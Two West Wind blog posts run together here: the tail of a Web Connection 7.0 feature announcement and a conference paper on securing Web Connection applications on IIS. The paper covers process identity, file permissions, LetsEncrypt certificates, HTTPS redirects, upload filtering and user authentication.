Web Connection 7.0 adds default support HTML Sanitation of the generated HTML content. Markdown is a superset of HTML so it's possible to embed script code into Markdown, and SanitizeHtml() is now hooked into the Markdown processor by default to strip out any script tags, JavaScript events and javascript: urls.

SanitizeHtml() is now also available as a generic HTML sanitation method in wwUtils - you can use it on any user captured HTML input to strip script code.

Web Connection 7.0 also includes a couple of new Markdown Features:

  • Markdown Islands in Scripts and Templates
  • Markdown Pages that can just be dropped into a site

Markdown Islands

Markdown Islands are blocks of markdown contained inside of a <markdown></markdown> block and is rendered as Markdown.

You can now do things like this:

<markdown>
   Welcome back <%= poModel.Username %>

   ### Your Orders
   <% 
      SELECT TOrders 
      SCAN
   %>
      **<%= TOrders.OrderNo %>** - <%= FormatValue(TOrders.OrderDate,"MMM dd, yyyy") %><% ENDSCAN %></markdown>

You can now embed script expressions and code blocks inside of Markdown blocks and they will execute.

Note that there are some caveats: Markdown blocks are expanded prior to full script parsing and any Markdown that is generated is actually embedded as static text into the page. The script processor then parses the rendered markdown just like it does any other HTML markdown on the page.

Markdown Pages

Markdown Pages is a new feature that lets you drop any .md file into a Web site and render that page as HTML content in your site - using the default

This is a great feature for quickly creating static HTML content like documentation, a simple blog, documents like about or terms of service pages and so on. Rather than creating HTML pages you can simple create a markdown document and drop it into the site and have it rendered as HTML.

For example, you can simply drop a Markdown file of a blog post document into a folder like this:

http://west-wind.com/wconnect/Markdown/posts/2018/09/25/FixWwdotnetBridgeBlocking.md

which results in a Web page like this:

All that needs to happen to make that work is dropping a markdown file into a folder along with its dependent resources:

You can customize how the Markdown is rendered via a Markdown_Template.wcs script page. By default this page simply renders using nothing more than the layout page as a frame with the content rendered inside of it. But the template is customizable.

Here's what the default template looks like:

<%
    pcPageTitle = IIF(type("pcTitle") = "C", pcTitle, pcFilename)
%><% Layout="~/views/_layoutpage.wcs" %><div class="container"><%= pcMarkdown %></div><link rel="stylesheet" href="~/lib/highlightjs/styles/vs2015.css"><script src="~/lib/highlightjs/highlight.pack.js"></script><script>
    function highlightCode() {
        var pres = document.querySelectorAll("pre>code");
        for (var i = 0; i < pres.length; i++) {
            hljs.highlightBlock(pres[i]);
        }
    }
    highlightCode();</script>

Three values are passed to this template:

  • pcTitle - the page title (parsed out from the document via YAML header or first # header)
  • pcFileName - the filename of the underlying .md file
  • pcMarkdown - the rendered HTML from the Markdown text of the file

Authentication and Security Enhancements

Security has been an ongoing area of improvement in Web Connection. Security is hard no matter what framework you use and Web Connection is no exception. Recent versions have gained many helper methods that make it much easier to plug in just the component so of the authentication system that you want to hook into or replace.

In this release the focus has been in making sure that all the authentication objects are in a consistent state when you access them. If you access cAuthenticatedUser, lIsAuthenticated, cAuthenticatedUsername, oUserSecurity and oUser and so on, Web Connection now makes sure that the current user has been validated. Previously it was left up to the developer to ensure that either Authenticate() or OnCheckForAuthentication() was called to actually validate the user and ensure the various objects and properties are set.

In v7.0 when you access any of these properties an automatic authentication check is performed that ensures that these objects and values are properly checked before you access them without any explicit intervention by your own code.

Another new feature is auto-encryption of passwords when the cPasswordEncryptionKey is set. You can now add non-encrypted passwords into the database and the next time the record is saved it will automatically encrypt the passwords. This allows an admin user the ability to add passwords without having to pre-hash them and it also allows legacy user security tables to automatically update themselves to encryption as they run.

New User Security Manager Addin Product

In parallel with the release of Web Connection 7.0 I'm also releasing a separate product, the User Security Manager for Web Connection which provides a complete user authentication and basic user management process as an addin Web Connection process class. The addin process class takes over all authentication operations besides the core authentication which is shared between your application process class(es).

The Security Manager is a drop in process class which means all the logic and code related to it is completely seperate from your application's process class(es). All authentication operations like sign in, sign out, account validation, password recovery, profile creationg and editing and user management are all handled completely independently.

In addition the library provides the base templates for enhanced login, profile editing, password recovery, account validation and the user manager. These templates are standard Web Connection script pages and they are meant to be extended if necessary with your own custom fields that relate to your user accouts.

You can find out more on the USer Security Manager Web site:

User Security Manager for Web Connection

What about breaking changes?

As I mentioned whenever these large upgrades become due we spend a bit of time to find the balance between new features, refactoring out unused features and breaking backwards compatibility.

Given the many enhancements and features in this v7.0 release the breaking changes are minimal, and for the most part require only simple fixes.

The core areas are:

  • Bootstrap and FontAwesome Updates in the Templates
  • VCX to PRG Class Migrations
  • Deprecated classes

Out of those the HTML Bootstrap update is easily the most severe - the others are mostly simple search and replace operations with perhaps a few minor adjustments.

There's a detailed topic in the help file that provides more information on the breaking changes:

Breaking Changes: Web Connection 7.0 from 6.x

More and more

There's still more and to see a complete list of all the changes that have been made check out the change log:

Web Connection Change Log

Summary

As you can see there's a lot of new stuff, and a lot of exciting new functionality in Web Connection 7.0. I'm especially excited about the project related features and easier launching of applications, as well as BrowserSync, which I've been using for the last month and which has been a big productivity boost.

So, check out Web Connection 7.0 and find your favorite new features.

this post created and published with Markdown Monster

Web Connection Security

$
0
0

Prepared for:Southwest Fox
October 2018

Security should be on every Web developer's mind when building a new Web application or enhancing an existing one. Not a day goes by that we don't hear about another security breach on some big Web site with scads of customer data compromised.

Security is hard

Managing Web site security is never easy as there are a lot of different attack vectors and if you are new to Web development it's very easy to miss even simple security precautions.

The good news is that the majority of security issues can be thwarted by a handful of good practices which I'll cover in this paper. But keep in mind that this is not all the things that can go wrong. I'm no security expert either but I've been around Web applications long enough to have seen most of the common attack vectors and know how to deal with them. But that's not to say that I have all the answers and this paper isn't meant to be an end all security document. If you are serious about security you should look at specific courses that deal explicitly with Web security, or even go as far as hiring a security specialist that can assess the state of security of your Web site.

Security is also an ongoing topic, something that needs to be kept up with. Attack vectors change over time, as do the tools you use to build and run your Web sites.

The main takeaway from this short introduction is that Security is serious business and you should think about it right from the moment you start building your application, while you are adding new features and when it is up and running even when it is 'done'. Be vigilant.

Web Connection and Security

West Wind Web Connection is a generic Web framework that provides an interface for FoxPro to interact with a Web Server - IIS Primarily - on Windows. Web Connection provides a rudimentary set of security features, but it is not and never was intended as a complete security solution.

Part of this is because the majority of security related issues have little to do with the actual application itself and deal more with network management and IT administration.

The focus of this paper is on the things that are important to a Web Connection application and that you as a developer using Web Connection and building a Web application have to think about.

Here's what I'm going to cover:

  • Web Security
    • Web Server Security - IIS
    • TLS Encryption
    • Authentication
  • Physical Access & Network
    • Who can get at the box?
    • Who can hack into the system
    • File system Permissions
    • Web Application Identity
  • Operating System
    • Who can access files on the machine
  • Middleware Technology
    • Who can hi-jack the application
    • Spoofing

Web Server and Site Security

The first step is making sure that your Web Server and your Web Site are secure. Most of the issues around this are related to setup configuration of IIS and the specific Web site you are creating.

IIS Security

The first line of defense involves the Web Server which in most cases for a Web Connection application will be Microsoft's built-in IIS server. IIS 7 and later is secure by default which means that when you install the Web Server it actually installs with very minimal features. The base install basically can serve static files and nothing more.

In order to configure IIS for Web applications and Web applications specifically you need to add a number of additional components that enable ASP.NET and or ISAPI, Authentication and some of the Administration features.

Figure 1 - Core features required for a Web Connection IIS installation

The key things are:

  • ASP.NET or ISAPI
    These are the connector interfaces that connects Web Connection to IIS. You only need one or the other to run, but both are supported in Web Connection and can be switched with simple configuration settings. The .NET module is the preferred mechanism which sports the most up to date code base and much more sophisticated administration features.

  • Authentication
    In order to access the Web Connection administrative features and to perform the default admin folder blocking, Web Connection uses default Windows authentication. If you use .NET you only need to install Windows Authentication, but Basic Authentication can also be used. Both of these auth mechanisms are tied to Windows user accounts. Web Connection also provides application level security features that are separate from either of these mechanisms (more on that later).

  • IIS Management
    In order for the Web Connection tools to configure IIS you need to have the IIS Management tools enabled, so you need to ensure the IIS Management Console is installed as well as the IIS 6 Metabase compatibility feature, which is a COM/ADS based IIS adminstration interface that's used by most tools.

How IIS and Web Connection Interact

A key perspective for understanding IIS Web Security from an application execution perspective is to understand how IIS and your Web Connection use Windows Identity while the application is executing.

It's all about Identity

The Windows Identity deteremines the rights that your application has on the Windows machine it is running on. A Web application's requests transfer through a number of Windows processes and each one has a specific Identity assigned to it.

Identity is crucial to system security because it determines what your Web application can access on the local machine and potentially on the network. The higher the access rights, the higher risk that if your application is compromised that some damage can be inflicted on the entire machine. The key is is if your application is compromised.

There's an inverse relationship between how secure your application is and how much effort you have to put in to use more limited accounts. Using a high permissions account like SYSTEM or an Admin account lets your application freely access the entire machine, but it if there ever is a problem it also lets a hacker access your entire machine freely. If you choose to run under a more limited security scheme you have to explicitly expose each location on disk and the possibly the network that the application has access to.

Realize that clamping down security may not help you prevent access to data that your application uses anyway in case of an attack. Your application needs to have access, so in case of a security compromise that means a potential hacker also has access. Still, it's a good idea to minimize rights as much as possible by using a lower rights account and explicitly setting access where it's needed.

Web Connection Uses SYSTEM by Default: Change it for Production

When a new Web Connection application is created, Web Connection by default sets the Identity to SYSTEM which is a full access account on Windows. WWWC does this because SYSTEM is the only generic account in Windows that has the rights to just work out of the box when running in COM mode. Any other account requires some configuration. The setup routines are meant to configure a development machine initially and are not meant for production. For production choose a specific account, or NETWORK SERVICE and provide explicit system rights required by your application.

IIS and FoxPro

Let's drill in a little closer to understand where Identity applies. For IIS and Web Connection there are two different processes that you are concerned with and each can, but doesn't have to, have it's own process Identity:

  • The IIS Application Pool
  • Your FoxPro Exe Server

For Web Connection both are separate EXEs and each can have their own identity.

Use Launching User Passthrough Identity for FoxPro Server

I recommend you never explicitly set the identity of your FoxPro EXE (in DCOMCnfg), but rather use the default, pass-through security of the Launching User that is used when custom DCOM Identity is applied. By doing so you only need to worry about the Identity of the Application Pool and not that of your FoxPro EXE.

The Process and Identity Hierachy

Figure 2 shows the different processes that are involved when running an IIS Web Server:

Figure 2 - IIS and Web Connection in the Context of Windows

IIS is a Windows Web Server so everything is hosted within the context of the Windows OS. All the boxes you see in Figure 2 are processes.

IIS Administration Service

The IIS Admin service is a top level service and somewhat disconnected system service that is responsible for launching Web Sites/Application Pools and monitoring them. When IIS starts or when you recycle IIS as a whole or an individual Application Pool you are interacting with the IIS Admin service. It's responsible for making sure that Web sites get started, keep running and monitors individual application pools for the various process limits you can configure in the Application Pool configuration. This service sits in the background of Windows and is internal to it - you generally don't configure or interact with it directly except when you use the Management Console, or IISRESET .

Application Pool

Application Pools are the base process, an EXE that one or more Web sites are hosted in. You can configure many application pools in IIS and you can add 1 or more Web sites to an application pool. Generally it's best to give mission critical applications their own application pool, while it's perfectly fine for many light use or static Web sites to be sharing a single Application Pool.

An application pool executes as an EXE: w3wp.exe. When you are running IIS and you have active clients you can see one or more w3wp.exe

Figure 3 - Application Pools (w3wp.exe) and Web Connection EXE are separate processes with their own identity

I think of an Application Pool as the Web application and I like to set the Identity of the Application Pool in the Application Pool settings as the only place where Identity is set. Instead, I use the default passthrough security for any processes that are launched from the application pool.

Figure 4 - You can set Application Pool Identity in the Advanced Settings for the Pool

FoxPro Web Connection Server

Your FoxPro Web Connection Server runs as a seperate out of process COM EXE server or as a file based standalone FoxPro application.

File based servers always are started either as the Interactive User if you explicitly start the server from Explorer, or it is started using the Application Pools Identity.

COM servers use either the Application Pool's Identity - which I highly recommend - or the Identity you explicitly assign in DCOMCnfg. I really want to dissuade you from setting Identity in DcomCnfg simply because it can get very confusing what's running what. The only time that makes sense if you really want your IIS process and your FoxPro COM server to use different accounts.

The idea scenario is that the default DCOM Identity configuration is use which is the Launching User using DcomCnfg:

Figure 5 - DcomCnfg lets you set the identity of your FoxPro server. Don't do it unless you have a good reason

Note that Figure 5 shows the default so you never have to explicitly set the Launching User. Only set this setting if you are changing the Identity to something else.

Make sure to use the 32 bit version of DcomCnfg:
MMC comexp.msc /32

When do you need DcomCnfg?

One big frustration with Web Connection is that it runs EXE server that might need configuration. If you are using the default setup for Web Connection which uses the SYSTEM account no DCOM Configuration is required.

No DCOM Configuration is required for:

  • SYSTEM
  • Administrator accounts
  • Interactive

All other accounts have to configure the DCOM Access and Launch and Activation settings to allow specific users to launch either your COM server specifically or COM servers generically on the machine.

Figure 6 - Setting Launch and Access and Activate for a DCOM Server

These permissions can either be set on the specific server as shown here, or at the Local Machine level in which case they are applied to launching all EXE servers. In this example, I'm explicitly adding NETWORK SERVICE to the the permissions. Both Launch and Access (shown) and Activation have to be set.

Network Service as a Production Account

For production machines I often use Network Service because its a low rights, generic account that has to be explicitly given access everywhere, but it's generic and doesn't require a password nor requires configuration of a special user account which makes your configuration more portable.

Beware of the ApplicationPoolIdentity

IIS by default creates new accounts using ApplicationPoolIdentity which is a dynamic account that has no rights on the local machine at all. You can't even set permissions for it in the Windows ACL dialogs. This account is meant for static sites that don't touch the local machine in any way and they are not appropriate for use of Web Connection. You will not be able to launch a COM Server or even a file server from the Web server with it.

Identity and your Application

Once your security is configured your application runs under a specific account and that account is what has access to the disk and other system services. If your app runs under NETWORK SERVICE, so you won't be able to write HKEY_LOCAL_MACHINE in the registry for example or write a file into the c:\Windows\System32 directory.

The goal is to allow access only in application specific locations so that if your application is compromised in any way at worst you can damage your own application and the user can't take over the entire machine. If you run as SYSTEM, it is possible for the attacker to potentially plant malware or other executing code that monitors your machine and sends data off to somewhere else.

It all boils down to this:

Choose an account to run your application that has the rights that your application needs to run and nothing more

File System Security

Related to the process identity is File System security. The file system is probably the most vulnerable aspect when it comes to attempted hack attempts. Hackers love to exploit holes in applications that allow any sort of file uploads that might allow them to plant an executable in the file system, and the somehow execute that file to compromise security or access your data.

The best avenue to thwart that sort of scenario is to minimize file permissions as much as possible.

Choose a limited Application Account

A lot of this was discussed in the Application Pool security section where I discussed using a low rights account and then giving it just the rights needed to run the application. Once you have a low rights account start with minimal permissions needed and very selectively give WRITE permissions.

Web Folders
  • Read/Execute Permissions in the Web Folder
  • Read/Write for web.config or wc.ini in Web Folder
    to persist Admin page configuration settings (optional)
Application Folder
  • Read/Execute in the Application/EXE folder
  • Read/Write access in Data Folders
  • Better: Don't use local data, but a SQL Backend for Data Access

Isolate your Data

In addition to system file access you also have to worry about data breaches. If you're using local or network FoxPro data you need to worry about those data locations.

Don't allow direct access from the Internet

This seems pretty obvious but any data you access from your application should only be accessible internally with no access from the Internet. Don't put data into a Web accessible path inside of your Web site. Always put data files into a completely separate non-Web accessible folder hierarchy.

Web Connection by default uses this structure:

Project Root
--- Data                 Optional Data Folder
--- Deploy               Application Binaries
--- Web                  Mapped Web Folder

This is just a suggestion, but whatever you do, never put data files (or anything else that is sensitive) into the Web folder. It's acceptable to put data into the Deploy folder as a subfolder. Do put your data files into a self-contained folder so it's easy to move the data.

And while you're at: For God's sake don't hardcode paths in your application. Try to always use Relative Paths, and if possible use variables for path names that can be read from a configuration file. If there's ever a problem being able to move the data quickly is key and having hard coded paths makes that very difficult. Configured paths from a configuration file can be changed without making code changes.

Ideally for security data should not be stored locally on the server, but rather sit on another machine that is not otherwise Internet accessible. The other machine should be on the internal network only or be accessible only via VPN. Make it so only your application account has access.

Use a SQL Backend on a Separate Server

An even better solution is to remove physical data entirely from the equation and instead storing your data inside of a SQL backend of some sort with the only way to access the data via username/password in the connection string that's encrypted.

As with data files, you want to make sure that the SQL backend is not exposed directly to the Internet. SQL Server by default doesn't allow remote access, but you can lock it down to specify which IP addresses or subnets have access. Likewise databases like MongoDb let you cut off internet access completely. Either way make sure that you use complex username and password sequences that are hard to break and store passwords in a safe place - encrypted if possible.

Protecting your Data

The next thing you'll want to do is ensure that your server is not leaking data and that the data you do send to others is secure and can't be spied upon.

Certificates: Protected Traffic on the Wire

The data you send over the wire may be sensitive or confidential. Or it's as simple as the fact that you log into a Web site and you send a username and password and that data has to be secure.

Web Server Certificates are meant to address this issue by encrypting all content that is transmitted over the Web connection. Both data you send and the data that comes back is encrypted using strong public key cryptography which makes it nearly impossible to spy on traffic as it travels over the wire.

Intercepting HTTP traffic is easier than you might think. Using little more than a network analyzer it's possible to siphon packets off the network and piece together requests if they are not encrypted. Worse there are hardware devices out there that can pose as a WiFi access point that capture network packets and then pass them on to another router as if nothing was wrong. Encryption of content over HTTPS prevents most of the attack vectors for this type of attack.

TLS (Transport Layer Security) addresses these issues by encrypting your content in such a way that your browser and the server are the only ones that can decrypt the content that travels over the wire making it very difficult for anybody listening in on the conversation 'en route' to get useful data out of the network packets.

TLS is for Security only not for Validation

One important thing to understand about TLS encryption and certificates is that the purpose of certificates is to encrypt content on the wire.

There are a couple of different 'grades' of certificates:

  • Standard Certificates (Instance Domain Validated)
  • Extended Validation (EV) Certificates

Contrary to what the big SSL Service companies like Verisign, Commodo, Digicert etc. want you to believe, certificates are not meant to serve the purpose of validation for a specific site. But 'Extended Validation' certificates purport to do this by requiring the registrant to go through an extra validation process that is not required for standard Certificates. Standard Certificates are validated simply by checking that the DNS for the domain is valid and matches the signature of the certificate request.

EV Certificates are a lot more expensive, especially now that Standard certificates are effectively free from LetsEncrypt (more on that in a minute). There's no difference between a standard certificate from LetsEncrypt or Verisign or Commodo - they all use the same level of encryption and the same level of DNS validation for example. EV certs do offer the green company name in the address bar, but if you check amongst the most popular sites on the Web you'll find that very few even very big companies bother to use these EV certificates. It's really just wasted money.

Wildcard Domains

If you need to secure an entire domain and all of its sub sites - ie. support.west-wind.com, markdownmonster.west-wind.com, store.west-wind.com, west-wind.com - you can use a Wildcard Certificate. Wildcard certificates let you bind a single certificate to any sub-domain and they are nice if you have a ton of subdomains, and absolutely essential if you run a multi-tenant Web site that uses subdomains.

For example, Markus Egger and I run kavadocs.com which lets users create subdomains for their own documentation sites: websurge.kavadocs.com, westwind-utilities.west-wind.com and so on are all bound to the single wildcard domain and managed through a single wildcard DNS entry that maps back to an Azure Web site. The application can then read the SERVER_NAME Server Variable to determine the target domain and handle requests for that particular tenant.

LetsEncrypt has been offering free certificates for a few years now and I've been running on those for the last 2 years. LetsEncrypt also started offering free wildcard domain certificates earlier this year so that makes it even easier to handle multi-domain web sites more easily.

HTTPS is no longer an Option

If you plan on running a commercial Web site of any sort, plan on using HTTPS for the site. Even if you think there's nothing sensitive about your site of cat pictures, there are good reason to always use HTTPS for your requests.

  • It's easy: No changes required on your Web site
  • It's more secure (Doh!)
  • It's free
  • Non secure sites are ranked lower on Search Engines
No Web Site Changes required

Switching a site to run from plain HTTP to HTTPS doesn't require any changes. HTTPS is simply a protocol change which means the only difference is that the URL changes from http://mysite.com to https://mysite.com. Assuming your code and links are not explicitly hardcoding URLs - which it definitely should not - you shouldn't need to make any changes. You can easily switch between HTTP and HTTPS and behavior should otherwise be the same.

TLS Certificates are now Free and Easy thanks to LetsEncrypt

A few years ago, Mozilla and consortium of industry players got together and created a free certificate authority called LetsEncrypt. LetsEncrypt provides domain specific TLS certificates for free using an open organization rather than a commercial entity to provide this service. What this means is that the service is totally free, no strings attached and it's designed to stay that way as it is not a commercial venture but rather an not-for-profit consortium of organizations that promote security on the Web.

LetsEncrypt makes Certificates Easy To Manage

In the past both price and certificate requests and installation was a pain, but LetsEncrypt also helps with the process. Not only are LetsEncrypt Certificates free, they are also very easy to install, revoke and renew. LetsEncrypt provides a set of public APIs that are used to make certificate requests and this ACME protocol framework provides a standards set of tools to manage the entire certificate creation, validation, revokation and renewal process.

There are tools for almost any platform that makes it easy to integrate with LetsEncrypt. On Windows there's an open source tool called Win-Acme (formerly called LetsEncrypt-Win-Simple) which makes it drop dead simple to create a certificate and install it into IIS. It's so easy you can do it literally in less than 5 minutes.

Let's walk through it:

  • Download the latest Win-Acme release from:
    https://github.com/PKISharp/win-acme/releases

  • Unzip the Zip file into a folder of your choice

  • Open an Administrative Powershell or Command Prompt

  • cd into the install folder

  • run .\letsencrypt

In the following example I'm creating a new certificate to one of my existing sites samples.west-wind.com. Before you do this make sure your DNS is set up and your site is reachable from the Internet using its full domain name.

Once you do this here's what running LetsEncrypt looks like:

Figure 7 - Executing Win-Acme LetsEncrypt from the Commandline

In this run I create a single site certificate so I just Create New Certificate, then choose Single Binding, then pick my site from the list (10 in this case). And that's it.

LetsEncrypt then goes out and uses the ACME protocol to make a new certificate request which involves creating the request and putting some API related data into a .well-known folder that LetsEncrypt checks to verify the domain exists and matches the machine that the certificate request originates from. LetsEncrypt calls back and verifies the information and if that's good issues a new certificate that is passed back to the client. The client then takes the completed certificate, imports it into IIS and creates the appropriate certificate mapping on your selected Web site.

Et voila! In all of 3-5 minutes and no manual interaction at all, you now have a new certificate on the site:

Figure 8 - A valid LetsEncrypt TLS Certificate on the site

and in IIS:

Figure 9 - LetsEncrypt automatically bind the certificate into IIS

LetsEncrypt also installs a scheduled task that once a day checks for certificates that are within a few days of expiring and automatically renews them. LetsEncrypt is smart enough to not renew or replace certificates that are already installed unless you use a --forcerenewal command line switch.

With certificates being free and ridiculously easy to install there's no reason not to install SSL certificates

Search Engines optimize Secure Sites

Google and Bing a couple of years ago started optimizing search rankings based on whether sites are secure. Non-secure sites are ranked down over secure sites with similar content.

This alone ought to be enough reason for any commercial site to use HTTPS for all requests.

Forcing a Site to use SSL

When you type a URL into a browser by default the URL is an http url. Recently browsers started to check for https first, then try http if that failed however that doesn't seem to be 100% reliable. You'll want to make sure that your site always returns HTTPS content.

The easiest way to do that is by using a Url Rewrite Rule. IIS has an optional tool called UrlRewrite that can be installed that allows you to apply a set of rules to rewrite any URL that comes into your site. Unfortunately UrlRewrite is not a native IIS component, so you have to install it first. Easiest is to install it with Chocolatey:

choco install UrlRewrite

Alternately you can install it with the IIS Platform Installer from this download link:

Once installed, UrlRewrite Rules can either be created in the IIS Admin UI, or you can directly add rules into the Web site's web.config file.

<configuration><system.webServer><rewrite><rules><rule name="Redirect to HTTPS" stopProcessing="true"><match url="(.*)" /><conditions><add input="{HTTPS}" pattern="^OFF$" /></conditions><action type="Redirect" url="https://{HTTP_HOST}/{R:1}" redirectType="SeeOther" /></rule></rules></rewrite></system.webServer></configuration>

This rule basically checks every URL that is not running https:// by checking the HTTPS header for a value of OFF (ie. it's not HTTPS). If it is off the URL is rewritten with the new protocol prepended to the host and the captured site relative path.

Once this rule is active any request to http:// is automatically re-routed to https://.

Note that you may also want to install a local, self-signed certificate in IIS for your local development so that your live and local dev environment both use HTTPS.

Just Do It

If you've been holding off using HTTPS, the time is now! Using LetsEncrypt makes the process of creating a new certificate and getting it into IIS ridiculously easy and best of all it's free.

5 minutes and no money down - what could be easier? You have everything to gain and nothing to lose.

File System Security

We already discussed Identity and how it affects file access, but let's turn this around and look at this from the application perspective. Each Web application is made up of a folder hierarchy(ies) which the application needs to access.

The golden standard for file system security is use rights that you absolutely need, and nothing more

In file system terms this usually means you need to make sure your Web application can access:

  • Your Application Folder (read/execute)
  • Your Data Folder if using FoxPro data (read/write)
  • Your Web Folder (read/execute)

Use a non-Admin Account

If you want to be secure everything starts by using a non Admin/non SYSTEM account that by default has no rights anywhere on the machine. Essentially, with an account like that you are white listing the exact folders that are allowed access and keep everything else off limits. If you build a single self contained application this should be easy to do. It gets more complicated if you have an application that needs to interact with other components or applications that also live on the same system. You should try to minimize these but even if that's the case you would still selectively enable rights as needed.

Minimize User Accounts

Remove or disable any user accounts on a server that are not used. Any user account is a potential attack vector. Windows won't create extra accounts but if you're using a shared server that's probably not an option. Even on shared machines make sure you know what each account is for and minimize what's there.

For Web Servers I recommend you don't expose domain accounts unless you need them to log into admin functions of the application. Using local accounts and duplicating them is a much safer choice to avoid potential corruption. THere should be very little need to use Windows Security on a Web server with the exception of the West Wind Web Connection Administration features. If you really want to you can even switch that to ASP.NET Forms Authentication with auth info stored inside of web.config.

NTFS File/Directory Permissions

IIS recognizes Windows ACL permissions on files and directories and again the Identity of your application is crucial here. There are two accounts that need to have rights to access a Web Site:

  • The Application Pool Identity has to have Read/Execute rights
  • The IUSR_ Account is required for Anonymous users to access the Web site

If you have any specific users you want to lock out you can remove or explicitly block the IUSR_ account. Web Connection does this by default to the /Admin folder which requires logging in order to be accessed because IUSR_ has been removed.

Beware of File Uploads

One of the scariest things you can do in a Web application is uploading files to a server. File uploads essentially allow a third party to bring content to your server, and you have to be extremely careful with what you do with file uploads.

The Threat of Remote Execution

The biggest concern is that somehow an executable file of some sort is uploaded, stored in a Web Folder and then executed remotely. Think for a minute that somehow a black hat is allowed to upload an ASPX page or a Web Connection script. If that is possible in any way shape or form the attacker basically has card blanche to execute code on your server, under the Idenity your application is running which is likely to be at least somewhat elevated. At the very least the attacker will access to your data, at worst if running as SYSTEM or Admin he can hack into your system and install additional malware that does much worse like install Ransomware, or install Malware that basically monitors whatever travels over the network.

Limit what can be Uploaded

The first defense with file uploads is to limit what can be uploaded. There should be no reason to ever allow binary or script files to be uploaded. Uploads should always filter both on the client and the server for the specific file types expected.

If you are expecting images, restrict to images, if you need a PDF allow only PDFs. If you need multiple files ask for a Zip file and always, always check extensions both on the client and server.

On the client use the accept attribute and specify a mime type or mime type wildcard:

<input type="file" id="upload" name="upload"
       multiple accept="image/*" />

On the Web Connection server you can explicitly check the file names and extract the extensions to check:

*** Files must use GetMultipartFile to retreive the file name as well
loFiles = Request.GetMultiPartFiles("Upload")

FOR EACH loFile IN loFiles
	lcExt = LOWER(JUSTEXT(lcFileName))
	IF !INLIST(lcExt,"jpg","png","jpeg","gif")
	   THIS.StandardPage("Upload Error","Only image files are allowed for upload.")
	   RETURN
	ENDIF
	IF LEN(loFile.Content) > 1500000
	   THIS.StandardPage("File upload refused",;"Files over 1.5meg are not allowed for this sample...<br/>"+;"File: " + loFile.FileName)
	   RETURN
	ENDIF
	...
ENDFOR	

Never allow uploads to upload 'just anything' - always limit the supported file types to specific content types. The most common things that are uploaded are images, pdfs, and Zip files. Zip files are relatively safe since they can't be executed as is.

Never Store Executable or Script Code in Web Accessible Folders

If you allow people to upload executable code (you never should - but if you for some crazy reason do) don't allow that content to be accessible from anywhere in your Web site.

Require a Login for Uploads

Any site that allows random file uploads should always require logins so that at the very least the user had to register at some point and there's at least a minimal audit trail. Just having a login will dissuade a huge number of generic attacks because without having a compromised account there's no way to even try to find random POST and Upload links on a site by Web site scanners. Authentication is a quick and easy way to remove a bunch of malicious activity.

This holds true for most POST/PUT operations in general. Read only content is rarely a problem for hacking problems, but any operation that involves data writing has potential to attract bad operators.

Most applications easily can justify an account requirement for data updates.

System Security Summary

So far I've primarily talked about System Security that's not very specific to Web Connection. System security is vitally important for setting up and configuring your system and getting it ready to host an application.

Windows and IIS have gotten pretty good over the years of reducing the attack service for hacking drastically by minimizing what features are enabled by default and forcing Administrators to explicitly enable what they need. The Web Connection configuration tools help with this considerably in ensuring that your application is reasonably well configured right out of the gate, but you should still review the base settings.

The most important thing to always consider is the application Identity discussed earlier and applying that identity selectively. Next we'll look at application security which arguably is even more important and more relevant to developers.

Protecting your Application

System security is the underlying security issue that you need to avoid, but application security is usually the entry point for potential hacking attempts. Before system security can be compromised, 99% of the time the application has to be compromised first to even allow access to system security features.

There are a number of different aspects to this. At a high level there's authentication and access level secuity of an application that's responsible for making sure only the appropriate user can see the data that he or she has access to. Failing on this end can cause data breaches where data can be accessed in unauthorized ways.

The other issue is potential holes in the application's security that might allow the application itself to be highjacked. Maybe it's possible to somehow execute code that can then jump into the system security issues that I discussed in the last section. Remote execution hacks are among the most critical and something that any application that uses dynamic code or scripts potentially has to worry about.

Finally there's also JavaScript exploits, mostly in the form of Cross Site Scripting (XSS) attacks that can compromise user data as they are using the application. XSS attacks are based on malicious JavaScript code that has made its way into an application and then can execute malicious JavaScript code that can send off sensitive data to another server.

Web Authentication in Web Connection

Authentication is the process of logging users in and mapping them to a user account. Web Connection supports authentication in two ways.

  • Windows or Basic Authenication against Windows Accounts
    This is a quick and dirty way for authentication where you don't have to set anything up and it just works. This uses Windows accounts, but it's really appropriate only for internal network applications or for securing say an Admin area of a Web site. It's not really appropriate for general public authentication because it requires Windows accounts that have to be configured which is not very practical.

  • User Security Authentication
    This mechanism is implemented using a FoxPro class and is based around a single cookie and a matching session record for each authenticated user. This mechanism uses a class with a few simple authentication methods and stores user data in a FoxPro table. The class is meant to be overridden by applications to add custom features or store data in some other storage like SQL Server.

Authentication is managed by the wwProcess class which has a handful of methods to authenticate users and customize the login process.

The base features of mechanisms can be used interchangeably by specifying the mechanism in the Process class. Here are some of the things you can override in your Process class

*** Basic UserSecurity mode: Basic or UserSecurity
cAuthenticationMode = "UserSecurity"

It should be noted that Basic will also work with Windows Authentication if enabled on the Web server - it basically looks at IIS login information rather than the Session info UserSecurity uses.

Don't use Basic for application level Security

Basic and Windows Auth is useful for internal apps or little one of applications that you build for yourself, but for public facing sites managing users with Windows authentication is terrible. You also have very little control over the login process and you get an ugly pop up window that is not application styled. For the rest of this section we'll talk about UserSecurity Authentication only.

Forcing a LogIn

Authentication is meant to protect access to a Web Connection request or part thereof. If you want to make sure a user is authenticated, you can use the Authenticate() method to check whether the user is authenticated and if not pop up an authentication form:

FUNCTION MyProcessMethod()

*** Checks if logged in
*** If not a Auth dialog displays
IF !THIS.Authenticate("ANY")
   RETURN   && Just exit processing
ENDIF

THIS.StandardPage("Hello World",;"You're logged in as " + this.cAuthenticatedUser )

If a user hits this request an auth dialog pops up automatically. For Basic/Windows auth a system dialog pops up. For UserSecurity an HTML form pops up.

Here's the default UserSecurity login form:

Figure 10 - A UserSecurity Authentication request

By default the login form is driven by a template in ~/Views/_login.wcs which you can customize as you see fit. The template contains a link to the main _layout.wcs page which provides the page Chrome`.

Very basic out of Box UI Features

The thing to understand about the built in authentication UI features is that they are very basic. It allows you to force a login, but there's no built-in mechanism for creating a new account, recovering a password or anything else related to account management. The form in Figure 10 basically just provides a login against a FoxPro table (or your own subclass which can do whatever it needs). I'll discuss of how to build that part of the functionality a little later on.

User Security Authentication

The user security class provides a base class called wwUserSecurity which provides simple user authentication and basic CRUD operations for adding, editing, deleting and looking up of users.

The most important method is the wwUserSecurity.Authenticate() method which is used to actually validate a username and password by looking it up in the UserSecurity.dbf table by default. The method checks for active status, account expiration and optionally manages looking up an encrypted password.

